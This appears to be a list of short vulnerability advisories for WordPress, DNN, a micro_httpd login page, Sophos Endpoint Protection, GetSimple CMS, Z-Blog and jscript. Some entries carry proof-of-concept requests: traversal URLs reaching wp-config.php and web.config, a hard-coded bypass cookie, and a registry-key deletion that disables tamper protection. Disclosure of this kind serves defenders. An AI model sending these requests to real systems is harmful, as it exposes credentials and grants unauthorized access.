Allows an attacker to browse arbitrary files via the download.php file: http://target[.]com/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php
The DNNArticle module 11 for DNN (formerly DotNetNuke) allows remote attackers to read the web.config file, and consequently discover database credentials, via the /GetCSS.ashx/?CP=%2fweb.config URI.
The vulnerability exists in a plaintext, hard-coded cookie. Using any cookie manager extension, an attacker can bypass the login page by setting the following master cookie: Cookie: Name=0admin. The homepage can then be accessed without authentication. Due to an improper session implementation, there is a second way to bypass login. The response to a request for the homepage without authentication looks like this: HTTP/1.1 200 Ok Server: micro_httpd Cache-Control: no-cache Date: Tue, 03 Apr 2018 18:33:12 GMT Set-Cookie: Name=; path=/ Content-Type: text/html Connection: close <html><head><script language='javascript'> parent.location='login.html' </script></head><body></body></html>HTTP/1.1 200 Ok Server: micro_httpd Cache-Control: no-cache Date: Tue, 03 Apr 2018 18:33:12 GMT Content-Type: text/html Connection: close <html> <head>.. continue to actual homepage source. The response is malformed (two responses are concatenated, and the actual homepage source follows the redirect stub), and intercepting it with Burp Suite and modifying it to the following grants access to the homepage without authentication: HTTP/1.1 200 Ok Server: micro_httpd Cache-Control: no-cache Date: Tue, 03 Apr 2018 18:33:12 GMT Set-Cookie: Name=; path=/ Content-Type: text/html Connection: close <html> <head>.. continue to actual homepage source.
Sophos Endpoint Protection control panel authentication uses a weak, unsalted, Unicode-encoded cryptographic hash function (SHA1). The absence of a salt allows attackers who gain access to the hash to conduct faster cracking attacks using pre-computed dictionaries, e.g. rainbow tables. This can potentially result in unauthorized access that could allow changing settings, whitelisting files, or unquarantining files.
Sophos Endpoint Protection offers an enhanced tamper protection mechanism which can be bypassed by deleting the registry key "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Sophos Endpoint Defense". This allows attackers to create arbitrary registry keys or edit keys and settings under the protected "tamper" protection config key.
Cross-site scripting (XSS) vulnerability in admin/template/js/uploadify/uploadify.swf in GetSimple CMS 3.3.13 allows remote attackers to inject arbitrary web script or HTML, as demonstrated by the movieName parameter.
This is a website physical path leakage vulnerability. The proof of concept (POC) involves visiting the following pages: http://localhost/z-blog//zb_system/admin/admin_footer.php, http://localhost/z-blog//zb_system/admin/admin_header.php, http://localhost/z-blog//zb_system/admin/admin_left.php, http://localhost/z-blog//zb_system/admin/admin_top.php, http://localhost/z-blog//zb_system/function/c_system_admin.php, http://localhost/z-blog//zb_system/function/c_system_misc.php, http://localhost/z-blog//zb_system/function/lib/category.php, http://localhost/z-blog//zb_system/function/lib/comment.php, http://localhost/z-blog//zb_system/function/lib/dbmysql.php, http://localhost/z-blog//zb_system/function/lib/dbmysqli.php, http://localhost/z-blog//zb_system/function/lib/dbpdo_mysql.php, http://localhost/z-blog//zb_system/function/lib/dbpdo_pgsql.php, http://localhost/z-blog//zb_system/function/lib/dbpdo_sqlite.php, http://localhost/z-blog//zb_system/function/lib/dbpgsql.php, http://localhost/z-blog//zb_system/function/lib/dbsqlite.php, http://localhost/z-blog//zb_system/function/lib/dbsqlite3.php, http://localhost/z-blog//zb_system/function/lib/member.php, http://localhost/z-blog//zb_system/function/lib/module.php, http://localhost/z-blog//zb_system/function/lib/networkcurl.php, http://localhost/z-blog//zb_system/function/lib/networkfile_get_contents.php, http://localhost/z-blog//zb_system/function/lib/networkfsockopen.php, http://localhost/z-blog//zb_system/function/lib/post.php, http://localhost/z-blog//zb_system/function/lib/sqlmysql.php, http://localhost/z-blog//zb_system/function/lib/sqlpgsql.php, http://localhost/z-blog//zb_system/function/lib/sqlsqlite.php, http://localhost/z-blog//zb_system/function/lib/tag.php, http://localhost/z-blog//zb_syste
This is an XSS vulnerability that can attack users. The vulnerability exists in the ZC_BLOG_SUBNAME and ZC_UPLOAD_FILETYPE parameters of the zb_system/cmd.php script. An attacker can inject malicious JavaScript code into these parameters and execute it in the user's browser.
This is an XSS vulnerability that can attack users. The PoC includes four URLs that contain malicious code that can be used to execute an XSS attack.
When jscript executes an Array method (such as Array.join), it first retrieves the length of the array. If the input is not an array but an object, the object's length property is retrieved and converted to a scalar. During this conversion, the "length" property is not tracked by the garbage collector, and the conversion to a scalar triggers toString()/valueOf() callbacks. Thus, during these callbacks, the "length" property can be freed, and the freed memory can then be referenced by accessing the "this" variable inside the toString()/valueOf() function.